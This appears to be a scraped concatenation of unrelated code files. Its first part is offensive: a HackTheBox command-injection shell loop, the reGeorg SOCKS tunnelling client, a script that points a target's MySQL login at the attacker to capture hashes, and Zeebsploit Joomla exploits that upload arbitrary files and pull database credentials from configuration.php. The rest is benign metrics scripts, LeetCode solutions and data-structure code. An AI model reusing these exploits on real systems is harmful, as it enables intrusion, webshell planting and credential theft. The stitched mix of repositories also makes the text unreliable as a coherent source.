'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', } try: while True: cmd = raw_input("$ ") data = 'db=;{}'.format(cmd) html = requests.post('http://10.10.10.127/select', headers=headers, data=data, verify=False).text soup = BeautifulSoup(html,"lxml") out = soup.find('pre').text print out.replace('\n\n', '\n') except: exit() if __name__ == '__main__': rce() ``` #### File: HackTheBox/Hackback/reGeorgSocksProxy.py ```python import logging import argparse import urllib3 from threading import Thread from urlparse import urlparse from socket import * from threading import Thread from time import sleep # Constants SOCKTIMEOUT = 5 RESENDTIMEOUT = 300 VER = "\x05" METHOD = "\x00" SUCCESS = "\x00" SOCKFAIL = "\x01" NETWORKFAIL = "\x02" HOSTFAIL = "\x04" REFUSED = "\x05" TTLEXPIRED = "\x06" UNSUPPORTCMD = "\x07" ADDRTYPEUNSPPORT = "\x08" UNASSIGNED = "\x09" BASICCHECKSTRING = "Georg says, 'All seems fine'" # Globals READBUFSIZE = 1024 # Logging RESET_SEQ = "\033[0m" COLOR_SEQ = "\033[1;%dm" BOLD_SEQ = "\033[1m" BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) LEVEL = {"INFO": logging.INFO, "DEBUG": logging.DEBUG, } logLevel = "INFO" COLORS = { 'WARNING': YELLOW, 'INFO': WHITE, 'DEBUG': BLUE, 'CRITICAL': YELLOW, 'ERROR': RED, 'RED': RED, 'GREEN': GREEN, 'YELLOW': YELLOW, 'BLUE': BLUE, 'MAGENTA': MAGENTA, 'CYAN': CYAN, 'WHITE': WHITE, } def formatter_message(message, use_color=True): if use_color: message = message.replace("$RESET", RESET_SEQ).replace("$BOLD", BOLD_SEQ) else: message = message.replace("$RESET", "").replace("$BOLD", "") return message class ColoredFormatter(logging.Formatter): def __init__(self, msg, use_color=True): logging.Formatter.__init__(self, msg) self.use_color = use_color def format(self, record): levelname = record.levelname if self.use_color and levelname in COLORS: levelname_color = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + RESET_SEQ record.levelname = levelname_color return logging.Formatter.format(self, record) class ColoredLogger(logging.Logger): def __init__(self, name): FORMAT = "[$BOLD%(levelname)-18s$RESET] %(message)s" COLOR_FORMAT = formatter_message(FORMAT, True) logging.Logger.__init__(self, name, logLevel) if (name == "transfer"): COLOR_FORMAT = "\x1b[80D\x1b[1A\x1b[K%s" % COLOR_FORMAT color_formatter = ColoredFormatter(COLOR_FORMAT) console = logging.StreamHandler() console.setFormatter(color_formatter) self.addHandler(console) return logging.setLoggerClass(ColoredLogger) log = logging.getLogger(__name__) transferLog = logging.getLogger("transfer") class SocksCmdNotImplemented(Exception): pass class SocksProtocolNotImplemented(Exception): pass class RemoteConnectionFailed(Exception): pass class session(Thread): def __init__(self, pSocket, connectString): Thread.__init__(self) self.pSocket = pSocket self.connectString = connectString o = urlparse(connectString) try: self.httpPort = o.port except: if o.scheme == "https": self.httpPort = 443 else: self.httpPort = 80 self.httpScheme = o.scheme self.httpHost = o.netloc.split(":")[0] self.httpPath = o.path self.cookie = None if o.scheme == "http": self.httpScheme = urllib3.HTTPConnectionPool else: self.httpScheme = urllib3.HTTPSConnectionPool def parseSocks5(self, sock): log.debug("SocksVersion5 detected") nmethods, methods = (sock.recv(1), sock.recv(1)) sock.sendall(VER + METHOD) ver = sock.recv(1) if ver == "\x02": # this is a hack for proxychains ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1)) else: cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1)) target = None targetPort = None if atyp == "\x01": # IPv4 # Reading 6 bytes for the IP and Port target = sock.recv(4) targetPort = sock.recv(2) target = "." .join([str(ord(i)) for i in target]) elif atyp == "\x03": # Hostname targetLen = ord(sock.recv(1)) # hostname length (1 byte) target = sock.recv(targetLen) targetPort = sock.recv(2) target = "".join([unichr(ord(i)) for i in target]) elif atyp == "\x04": # IPv6 target = sock.recv(16) targetPort = sock.recv(2) tmp_addr = [] for i in xrange(len(target) / 2): tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1]))) target = ":".join(tmp_addr) targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1]) if cmd == "\x02": # BIND raise SocksCmdNotImplemented("Socks5 - BIND not implemented") elif cmd == "\x03": # UDP raise SocksCmdNotImplemented("Socks5 - UDP not implemented") elif cmd == "\x01": # CONNECT serverIp = target try: serverIp = gethostbyname(target) except: log.error("oeps") serverIp = "".join([chr(int(i)) for i in serverIp.split(".")]) self.cookie = self.setupRemoteSession(target, targetPort) if self.cookie: sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) return True else: sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) raise RemoteConnectionFailed("[%s:%d] Remote failed" % (target, targetPort)) raise SocksCmdNotImplemented("Socks5 - Unknown CMD") def parseSocks4(self, sock): log.debug("SocksVersion4 detected") cmd = sock.recv(1) if cmd == "\x01": # Connect targetPort = sock.recv(2) targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1]) target = sock.recv(4) sock.recv(1) target = ".".join([str(ord(i)) for i in target]) serverIp = target try: serverIp = gethostbyname(target) except: log.error("oeps") serverIp = "".join([chr(int(i)) for i in serverIp.split(".")]) self.cookie = self.setupRemoteSession(target, targetPort) if self.cookie: sock.sendall(chr(0) + chr(90) + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) return True else: sock.sendall("\x00" + "\x91" + serverIp + chr(targetPort / 256) + chr(targetPort % 256)) raise RemoteConnectionFailed("Remote connection failed") else: raise SocksProtocolNotImplemented("Socks4 - Command [%d] Not implemented" % ord(cmd)) def handleSocks(self, sock): # This is where we setup the socks connection ver = sock.recv(1) if ver == "\x05": return self.parseSocks5(sock) elif ver == "\x04": return self.parseSocks4(sock) def setupRemoteSession(self, target, port): headers = {"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": port} self.target = target self.port = port cookie = None conn = self.httpScheme(host=self.httpHost, port=self.httpPort) # response = conn.request("POST", self.httpPath, params, headers) response = conn.urlopen('POST', self.connectString + "?cmd=connect&target=%s&port=%d" % (target, port), headers=headers, body="") if response.status == 200: status = response.getheader("x-status") if status == "OK": cookie = response.getheader("set-cookie") log.info("[%s:%d] HTTP [200]: cookie [%s]" % (self.target, self.port, cookie)) else: if response.getheader("X-ERROR") is not None: log.error(response.getheader("X-ERROR")) else: log.error("[%s:%d] HTTP [%d]: [%s]" % (self.target, self.port, response.status, response.getheader("X-ERROR"))) log.error("[%s:%d] RemoteError: %s" % (self.target, self.port, response.data)) conn.close() return cookie def closeRemoteSession(self): headers = {"X-CMD": "DISCONNECT", "Cookie": self.cookie} params = "" conn = self.httpScheme(host=self.httpHost, port=self.httpPort) response = conn.request("POST", self.httpPath + "?cmd=disconnect", params, headers) if response.status == 200: log.info("[%s:%d] Connection Terminated" % (self.target, self.port)) conn.close() def reader(self): conn = urllib3.PoolManager() while True: try: if not self.pSocket: break data = "" headers = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"} response = conn.urlopen('POST', self.connectString + "?cmd=read", headers=headers, body="") data = None if response.status == 200: status = response.getheader("x-status") if status == "OK": if response.getheader("set-cookie") is not None: cookie = response.getheader("set-cookie") data = response.data # Yes I know this is horrible, but its a quick fix to issues with tomcat 5.x bugs that have been reported, will find a propper fix laters try: if response.getheader("server").find("Apache-Coyote/1.1") > 0: data = data[:len(data) - 1] except: pass if data is None: data = "" else: data = None log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target, self.port, response.status, status, response.getheader("X-ERROR"))) else: log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.port, response.status)) if data is None: # Remote socket closed break if len(data) == 0: sleep(0.1) continue transferLog.info("[%s:%d] <<<< [%d]" % (self.target, self.port, len(data))) self.pSocket.send(data) except Exception, ex: raise ex self.closeRemoteSession() log.debug("[%s:%d] Closing localsocket" % (self.target, self.port)) try: self.pSocket.close() except: log.debug("[%s:%d] Localsocket already closed" % (self.target, self.port)) def writer(self): global READBUFSIZE conn = urllib3.PoolManager() while True: try: self.pSocket.settimeout(1) data = self.pSocket.recv(READBUFSIZE) if not data: break headers = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream", "Connection": "Keep-Alive"} response = conn.urlopen('POST', self.connectString + "?cmd=forward", headers=headers, body=data) if response.status == 200: status = response.getheader("x-status") if status == "OK": if response.getheader("set-cookie") is not None: self.cookie = response.getheader("set-cookie") else: log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target, self.port, response.status, status, response.getheader("x-error"))) break else: log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.port, response.status)) break transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data))) except timeout: continue except Exception, ex: raise ex break self.closeRemoteSession() log.debug("Closing localsocket") try: self.pSocket.close() except: log.debug("Localsocket already closed") def run(self): try: if self.handleSocks(self.pSocket): log.debug("Staring reader") r = Thread(target=self.reader, args=()) r.start() log.debug("Staring writer") w = Thread(target=self.writer, args=()) w.start() r.join() w.join() except SocksCmdNotImplemented, si: log.error(si.message) self.pSocket.close() except SocksProtocolNotImplemented, spi: log.error(spi.message) self.pSocket.close() except Exception, e: log.error(e.message) self.closeRemoteSession() self.pSocket.close() def askGeorg(connectString): connectString = connectString o = urlparse(connectString) try: httpPort = o.port except: if o.scheme == "https": httpPort = 443 else: httpPort = 80 httpScheme = o.scheme httpHost = o.netloc.split(":")[0] httpPath = o.path if o.scheme == "http": httpScheme = urllib3.HTTPConnectionPool else: httpScheme = urllib3.HTTPSConnectionPool conn = httpScheme(host=httpHost, port=httpPort) response = conn.request("GET", httpPath) if response.status == 200: if BASICCHECKSTRING == response.data.strip(): log.info(BASICCHECKSTRING) return True conn.close() return False if __name__ == '__main__': print """\033[1m \033[1;33m _____ _____ ______ __|___ |__ ______ _____ _____ ______ | | | ___|| ___| || ___|/ \| | | ___| | \ | ___|| | | || ___|| || \ | | | |__|\__\|______||______| __||______|\_____/|__|\__\|______| |_____| ... every office needs a tool like Georg <EMAIL> / @_w_m__ <EMAIL> / @trowalts <EMAIL> / @kamp_staaldraad \033[0m """ log.setLevel(logging.DEBUG) parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller') parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1") parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888") parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST", type=int, default="1024") parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script") parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO") args = parser.parse_args() if (args.verbose in LEVEL): log.setLevel(LEVEL[args.verbose]) log.info("Log Level set to [%s]" % args.verbose) log.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url)) log.info("Checking if Georg is ready") if not askGeorg(args.url): log.info("Georg is not ready, please check url") exit() READBUFSIZE = args.read_buff servSock = socket(AF_INET, SOCK_STREAM) servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) servSock.bind((args.listen_on, args.listen_port)) servSock.listen(1000) while True: try: sock, addr_info = servSock.accept() sock.settimeout(SOCKTIMEOUT) log.debug("Incomming connection") session(sock, args.url).start() except KeyboardInterrupt, ex: break except Exception, e: log.error(e) servSock.close() ``` #### File: Kryptos/files/challenge.py ```python __author__ = 'artikrh' import requests, re, socket import netifaces as ni from sys import exit from bs4 import BeautifulSoup """ - Requires Metasploit's auxiliary/server/capture/mysql - Hash format: $mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d - Hashcat code: 11200 """ def main(ip): s = requests.session() fetchtoken = s.get('http://10.10.10.129/').text soup = BeautifulSoup(fetchtoken, features="lxml") hidden_tags = soup.find_all("input", type="hidden") match = re.findall(r"([a-fA-F\d]{64})", str(hidden_tags[-1])) token = match[0] data = 'username=admin&password=<PASSWORD>&db=cryptor;host={}&token={}&login='.format(ip,token) headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = s.post('http://10.10.10.129/', headers=headers, data=data, verify=False) phpsessid = requests.utils.dict_from_cookiejar(s.cookies)['PHPSESSID'] print '[*] Save this valid PHPSESSID cookie to your browser through inspect element: {}'.format(phpsessid) def check(ip): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((ip,3306)) if result != 0: print '[*] MySQL is not remotely accessible! Exiting...' exit() sock.close() if __name__ == '__main__': ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] check(ip) main(ip) ```
{ "source": "8L4NK/Profil3r", "score": 2 }
#### File: core/services/_tchat.py ```python from profil3r.app.modules.tchat.skype import Skype # Skype def skype(self): self.result["skype"] = Skype(self.config, self.permutations_list).search() # print results self.print_results("skype") return self.result["skype"] ``` #### File: core/services/_travel.py ```python from profil3r.app.modules.travel.tripadvisor import Tripadvisor # TripAdvisor def tripadvisor(self): self.result["tripadvisor"] = Tripadvisor(self.config, self.permutations_list).search() # print results self.print_results("tripadvisor") return self.result["tripadvisor"] ```
{ "source": "8L4NK/Zeebsploit", "score": 2 }
#### File: lib/modules/joomla_exploit.py ```python import requests,re from .color import R,G,B,Y,W class com_fabrik: def joomla_com_fabrik(self,target,path,name): self.target = target self.path = path self.name = name requests.post( f"{self.target}/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=", data={ "name": "me.php", "drop_data": "1", "overwrite": "1", "field_delimiter": ",", "text_delimiter": "&quot;", "option": "com_fabrik", "controller": "import", "view": "import", "task": "doimport", "Itemid": "0", "tableid": "0" }, files={'userfile':(self.name,open(f"self.path","rb"),"multipart/form-data")} ) cek = requests.get(f"{self.target}/media/{self.name}") if cek == 200: print(f"{G}[*]{W} Success : {self.target}/media/{self.name}") else: print("{R}[x]{W} Failed Not Vulnerability") class com_ads_manager: def joomla_com_ads_manager(self,target,path,name): self.target = target self.path = path self.name = name requests.post( f"{self.target}/index.php?option=com_adsmanager&task=upload&tmpl=component", data={'name':self.name}, files={'file':open(self.path,'rb')} ) cek = requests.get(f"{self.target}/tmp/plupload/{self.name}") if cek == 200: print("{G}[*]{W} Success : {self.target}/tmp/plupload/{self.name}") else: print("{R}[x]{W} Not Vulnerability") class joomanager_config: def joomla_manager_get_config(self,target): self.target = target resp = requests.get( f"{self.target}/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php" ).text if 'JConfig'in resp: print('[+] Vulnerability ') host = re.findall("host = '(.*)';",resp) user = re.findall("user = '(.*)';",resp) pwd = re.findall("password = '(.*)';",resp) db = re.findall("db = '(.*)';",resp) print(f"{G}[*]{W} Vulnerability") print(f"Host : {host}\nUser : {user}\nPassword : {pwd}\nDB : {db}") else: print(f'{R}[x]{W} Not vulnerability') class com_jdownload: def joomla_com_jdownloads_file_upload( self, target, path, name, email, description ): self.target = target self.path = path self.name = name self.email = email self.description = description requests.post( f"{self.target}/index.php?option=com_jdownloads&Itemid=0&view=upload", data={ 'name': self.name, 'mail': self.email, 'catlist': '1', 'filetitle': "407 AEX", 'description': "<p>407 Aex</p>", '2d1a8f3bd0b5cf542e9312d74fc9766f': 1, 'send': 1, 'senden': "Send file", 'description': self.description, 'option': "com_jdownloads", 'view': "upload" }, files={ 'file_upload':(self.name,open(self.path,'rb'),'multipart/form-data'), 'pic_upload':('407',open(self.path,'rb'),'multipart/form-data') } ) cek = requests.get(f"{self.target}/images/jdownloads/screenshots/{self.name}") if cek.status_code == 200: print(f"{G}[*]{W} Success : {self.target}/images/jdownloads/screenshots/{self.name}") else: print(f"{R}[x]{W} Failed ! Not Vulnerability ") ``` #### File: lib/tmp/temp.py ```python import sys,time,requests,os,re import platform as plat import readline ip = requests.get('https://www.myip.com').text prot = re.findall('id="ip">(.*?)</',ip)[0] B = '\033[94m' P = '\033[0m' K = '\033[93m' I = '\033[92m' A = '\033[91m' X = '\033[96m' logo = f""" - 407 AUTHENTIC EXPLOIT - {B} ____ _ ___ _ _ _ |_ / ___ ___ | |__ / __| _ __ | | ___ (_)| |{I} {P} version :{K} 2.0{P} {B} / / / -_)/ -_)| '_ \\__ \| '_ \| |/ _ \| || _| /___|\___|\___||_.__/|___/| .__/|_|\___/|_| \__| |_|{P} Codename :{X} JaxBCD{P} Your IP :{K} {prot}{P} platform :{I} {plat.system()} {plat.node()} {plat.release()} {plat.version()} {plat.machine()} {plat.processor()}{P} user@host :{A} {os.getlogin()}{P}@{A}{plat.node()}{P} """ def __name(): a = '[\033[92m⣾\033[0m]', '[\033[92m⣽\033[0m]', '[\033[92m⣻\033[0m]', '[\033[92m⢿\033[0m]', '[\033[92m⡿\033[0m]', '[\033[92m⣟\033[0m]', '[\033[92m⣯\033[0m]', '[\033[92m⣷\033[0m]' for i in a: sys.stdout.write(' Starting Zeebsploit Framework\r - %s'%i) sys.stdout.flush() time.sleep(0.10) ```
{ "source": "8LabSolutions/Soldino-Poc", "score": 3 }
#### File: script/ccr/ccr.py ```python import os import datetime import matplotlib.pyplot as plt plt.rcParams.update({'figure.autolayout': True}) import pandas as pd from getFileList import getFileList def createFolder(directory): try: if not os.path.exists(directory): os.makedirs(directory) except OSError: print ('Error: Creating directory '+ directory) def ccr(filename): comments = 0 code = 0 with open(filename, "r") as inp: flag = False for line in inp: l = line.strip() if l != '': # linea non vuota if flag == False: # non è un commento multiriga if l[:2] == "//": #commento inline comments += 1 elif l[:2] == "/*" and l[-2:]=="*/": #commento multiriga inline comments += 1 elif l[:2] == "/*": # entra in un commento multiriga flag = True else: code += 1 else: # flag== True: sei in un commento multiriga if l[-2:] == "*/": flag = False else: # not */ comments += 1 #print comments #print code #ratio = float(comments)/float(code) #ratio = round(ratio,2) #print ratio return (comments, code) # main totalComments = 0 totalCode = 0 with open ('measurements.csv', "wt") as measurements: files = getFileList(["sol","js"]) #rimuovo file scomodi if "../../src/flat-ui/scripts/flat-ui.min.js" in files: files.remove("../../src/flat-ui/scripts/flat-ui.min.js") if "../../src/flat-ui/scripts/flat-ui.js" in files: files.remove("../../src/flat-ui/scripts/flat-ui.js") if "../../src/flat-ui/scripts/application.js" in files: files.remove("../../src/flat-ui/scripts/application.js") for file in files: comment, code = ccr(file) # QUESTA CAMBIA totalCode += code totalComments += comment ''' print(file) print (comment) print (code) ''' #print(file) newLine = file.split('/')[-1]+','+str(comment)+','+ str(code)+ '\n' measurements.write(str(newLine)) if (os.path.isfile('./ccrStatistics.csv')): #vuol dire che il file non esiste with open ('ccrStatistics.csv', 'at') as ccr: val = (float(totalComments)/float(totalCode)) * 100 line = str(datetime.datetime.now().isoformat()[:10])+','+str(round(val, 2))+'\n' ccr.write(line) else: #il file esiste già, appendo alla fine print('OCIO, creo il nuovo file ccrStatistics.csv') with open ('ccrStatistics.csv', 'wt') as ccr: header = 'data,valore\n' val = (float(totalComments)/float(totalCode)) * 100 line = str(datetime.datetime.now().isoformat()[:10])+','+str(round(val, 2))+'\n' ccr.write(header) ccr.write(line) ''' # COSE SUI GRAFICI df = pd.read_csv('ccrStatistics.csv') ccr_valori = df['valore'].tolist() ccr_date = df['data'].tolist() plt.plot(ccr_date, ccr_valori, label="CCR\nnel tempo") gap = int(len(ccr_valori)/5) #print(len(ccr_date)) counter = 0 for label in plt.gca().get_xaxis().get_ticklabels(): print(gap) print(counter%gap) if counter % gap != 0: label.set_visible(False) counter += 1 plt.legend(bbox_to_anchor=(1.04,1), loc="upper left") plt.subplots_adjust(right=0.8) #plt.grid(False) ax = plt.gca() ax.grid(which='major', axis='y', linestyle='-.') plt.xlabel('Data') plt.ylabel('CCR') plt.hlines(0.10, 0, max(ccr_date)+1, colors = 'y', linestyle ='solid', label = 'accettabile') plt.hlines(0.20, 0, max(ccr_date)+1, colors = 'g', linestyle ='solid', label = 'preferibile') #plt.suptitle('prova') plt.xticks(rotation=45) plt.tight_layout() cartella='plot_ccr' createFolder(cartella) plt.savefig(cartella+'/graph.pdf') ''' ``` #### File: deployment_cost/euro/deployment_cost_euro.py ```python import re import datetime INPUT_PATH = '../truffle_test/truffle_test_ris.txt' OUTPUT_PATH = 'deployment_cost.csv' def calc_average(list): sum = 0 for i in range(len(list)): sum += float(list[i]) ave = sum/(len(list)) ave = (round(ave,2)) return ave # SCRIPT: prendo i prezzi di deploy dei contratti. with open (INPUT_PATH,'r') as cv: lines = cv.readlines() # flag deployments = False # la maialata separator = '·····································' end = '·---------------------------------' ris = [] for line in lines: # considera solo le linee con i prezzi di deployment if 'Deployments' in line: # prezzi di deployement deployments = True continue elif end in line: deployments = False if deployments and separator not in line: contract_name = re.compile('\w+').search(line) contract_deploy_price = re.compile('(\d+\.\d+)\s[^\%]').search(line) ris.append([contract_name.group(),contract_deploy_price.group(1)]) # ok, abbiamo nome e prezzo # non ci resta che salvare in un array nomi e prezzi. poi calcola la media with open (OUTPUT_PATH,'a') as dep: # data ISO iso_time_and_date = datetime.datetime.now().isoformat() iso_date = iso_time_and_date[:10] # nomi dei contratti names = [] names.append('data') for i in range(len(ris)): #print (ris[i][0]) names.append(ris[i][0]) names.append('average') names =','.join(names) # da lista a stringa values = [] values.append(iso_date) # valori di deployment for i in range(len(ris)): #print (ris[i][1]) values.append(ris[i][1]) ave = calc_average(values[1:]) values.append(str(ave)) values = ','.join(values) #dep.write(names+'\n') # da stampare solo alla prima stampa dep.write(values+'\n') ```
{ "source": "8luebottle/DataStructure-N-Algorithm", "score": 3 }
#### File: DataStructure-N-Algorithm/Algorithm/best_time_to_buy_and_sell_stock.py ```python class Solution: def maxProfit(self, prices: List[int]) -> int: max_profit, min_price = 0, float('inf') for price in prices: min_price = min(min_price, price) max_profit = max(max_profit, price - min_price) return max_profit ``` #### File: DataStructure-N-Algorithm/Algorithm/house_robber.py ```python def rob(nums): last, maximum = 0, 0 for num in nums: last, maximum = maximum, max(last + num, maximum) return maximum """ Runtime: 24 ms, faster than 92.58% of Python3 online submissions for House Robber. Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for House Robber. """ ``` #### File: DataStructure-N-Algorithm/Algorithm/integer_to_roman.py ```python def intToRoman(num): arabic = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1] roman = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I'] romanized= '' for idx in range(0, len(arabic)): while num >= arabic[idx]: num -= arabic[idx] romanized += roman[idx] return romanized ``` #### File: DataStructure-N-Algorithm/Algorithm/linkedlist_LIFO.py ```python from node import Node class LinkedListLIFO(object): def __init__(self): self.head = None self.length = 0 # Start from Head print out each node's value def _printList(self): node = self.head while node: print(node.value, end=' ') node = node.pointer print() # Base to Prev Node | Delete Node def _delete(self, prev, node): self.length -= 1 if not prev: self.head = node.pointer else: prev.pointer = node.pointer # Add New Node. Point to Next node, Head pointing New node def _add(self, value): self.length += 1 self.head = Node(value, self.head) # Find Node through Index def _find(self, index): prev = None node = self.head i = 0 while node and i < index: prev = node node = node.pointer i += 1 return node, prev, i # Find node by Value def _find_by_value(self, value): prev = None node = self.head found = False while node and not found: if node.value == value: found = True else: prev = node node = node.pointer return node, prev, found # DELET NODE def deleteNode(self, index): node, prev, i = self._find(index) if index == i: self._delte(prev, node) else: print(f"There's no {index} Node") def deleteNodeByValue(self, value): node, prev, found = self._find_by_value(value) if found: self._delete(prev, node) else: print(f"There's no {value} node") ``` #### File: DataStructure-N-Algorithm/Algorithm/palindrome_number.py ```python def isPalindrome(self, x: int) -> bool: if x == 0: return True else: # Solve it wihout converting the integer to a string left = x right = 0 while left > 0 : reminder = left % 10 right = (right*10) + reminder left = left // 10 return x == right # Return Boolean ``` Runtime: 48 ms, faster than 93.37% of Python3 online submissions for Palindrome Number. Memory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Palindrome Number. ``` ``` #### File: DataStructure-N-Algorithm/Algorithm/search_insert_position.py ```python def searchInsert(nums, target): if target in nums: return nums.index(target) elif target <= nums[0]: return 0 elif target >= nums[-1]: return len(nums) else: for idx, val in enumerate(nums): if target < val: nums.index(idx, target) return nums.index(target) """ Runtime: 40 ms, faster than 98.23% of Python3 online submissions for Search Insert Position. Memory Usage: 13.5 MB, less than 100.00% of Python3 online submissions for Search Insert Position. """ ``` #### File: DataStructure-N-Algorithm/Algorithm/sqrt.py ```python def mySqrt(x): if x < 2: return x left, right = 1, x // 2 while left <= right: mid = left + (rigt-left) // 2 if mid > x / mid: right = mid -1 else: left = mid + 1 return left - 1 """ Runtime: 24 ms, faster than 96.59% of Python3 online submissions for Sqrt(x). Memory Usage: 12.6 MB, less than 100.00% of Python3 online submissions for Sqrt(x). """ ``` #### File: DataStructure-N-Algorithm/Data_Structure/queue.py ```python import heapq class Queue(object): def __init__(self): self.in_stack = [] self.out_stack = [] def _transfer(self): while self.in_stack: self.out_stack.append(self.in_stack.pop()) def enqueue(self): return self.in_stack.append(item) def dequeue(self): if not self.out_stack: self._transfer() if self.out_stack: return self.out_stack.pop() else: print("QUEUE is Empty!") def size(self): return len(self.in_stack) + len(self.out_stack) def peek(self): if not self.out_stack: self._transfer() if self.out_stack: return self.out_stack[-1] else: print("QUEUE is Empty!") def __repr__(self): if not self.out_stack: self._transfer() if self.out_stack: return repr(self.out_stack) else: print("QUEUE is Empty!") def isEmpty(self): return not (bool(self.in_stack) or bool(self.out_stack)) class PriorityQueue(object): def __init__(self): self._queue = [] self._index = 0 def push(self, item, priority): heapq.heappush(self._queue, (-priority, self._index, item)) self._index += 1 def pop(self): return heapq.heappop(self.queue)[-1] class Item: def __init__(self, name): self.name = name def __repr__(self): return "Item({0!r})".format(self.name) def test_priority_queue(): # Push와 pop --> (logN) q = PriorityQueue() q.push(Item('test1'), 1) q.push(Item('test2'), 4) q.push(Item('test3'), 3) assert(str(q.pop()) == "Item('test2')") print('Passed the Test') if __name__ == "__main__": test_priority_queue() ``` #### File: DataStructure-N-Algorithm/Data_Structure/sort.py ```python def selection_sort(seq): length = len(seq) for i in range(length-1): min_j = i for j in range(i+1, length): if seq[min_j] > seq[j]: min_j = j seq[i], seq[min_j] = seq[min_j], seq[i] return seq # Insertion Sort def insertion_sort(seq): for i in range(1, len(seq)): j = i while j > 0 and seq[j-1] > seq[j]: seq[j-1], seq[j] = seq[j], seq[j-1] j -= 1 return seq def insertion_sort_rec(seq, i=None): if i is None: i = len(seq) - 1 if i == 0: return i insertion_sort_req(seq, i-1) j = i while j > 0 and seq[j-i] > seq[j]: seq[j-1], seq[j] = seq[j], seq[j-1] j -= 1 return seq # Bubble Sort def bubble_sort(seq): length = len(seq)-1 for num in range(length, 0, -1): # Sort by Descending Order for i in range(num): if seq[i] > seq[i+1]: seq[i], seq[i+1] = seq[i+1], seq[i] # Exchange it return seq # Gnome Sort def gnome_sort(seq): i = 0 while i < len(seq): if i == 0 or seq[i-1] <= seq[i]: i += 1 else: seq[i], seq[i-1] = seq[i-1], seq[i] i -= 1 return seq #Count Sort def count_sort_dict(a): b, c = [], defaultdict(list) for x in a: c[x].append(x) for k in range(min(c), max(c) + 1): b.extend(c[k]) return b # Quick Sort def quick_sort_cache(seq): if len(seq) < 2: return seq ipivot = len(seq) pivot = seq[ipivot] before = [x for i, x in enumerate(seq) if x <= pivot and i != ipivot] after = [x for i, x in enumerate(seq) if x > pivot and i != ipivot] return quick_sort_cache(before) + [pivot] + quick_sort_cache(after) # Heap Sort : Without Using Module def heap_sort(seq): for start in range((len(seq)-2)//2, -1, -1): siftdown(seq, start, len(seq)-1) for end in range(len(seq)-1, 0, -1): seq[end], seq[0] = seq[0], seq[end] siftdown(seq, 0, end-1) return seq def siftdown(seq, start, end): root = start while True: child = root * 2 + 1 if child > end: break if child + 1 <= end and seq[child] < seq[child + 1]: child += 1 if seq[root] < seq[child]: seq[root], seq[child] = seq[child], seq[root] root = child else: break ``` #### File: DataStructure-N-Algorithm/Data_Structure/stack.py ```python class Stack(object): def __init__(self): self.items = [] def istEmpty(self): return not bool(self.items) def push(self, value): self.items.append(value) def pop(self): value = self.items.pop() if value is not None: return value else: print('Stack is Empty.') def size(self): return len(self.items) def peek(self): if self.items: return self.items[-1] else: print('Stack is Empty.') def __repr__(self): return repr(self.items) if __name__ == "__main__": stack = Stack() print('Is Stack Empty? {0}'.format(stack.isEmpty())) print('Add 0-9 number to the stack.') for i in range(10): stack.push(i) print('Stack Size: {0}'.format(stack.size())) print('peek: {0}'.format(stack.peek())) print('pop: {0}'.format(stack.pop())) print('peek: {0}'.format(stack.peek())) print('Is Stack Empty? {0}'.format(stack.isEmpty())) print(stack) ```
{ "source": "8me/DuCroy", "score": 2 }
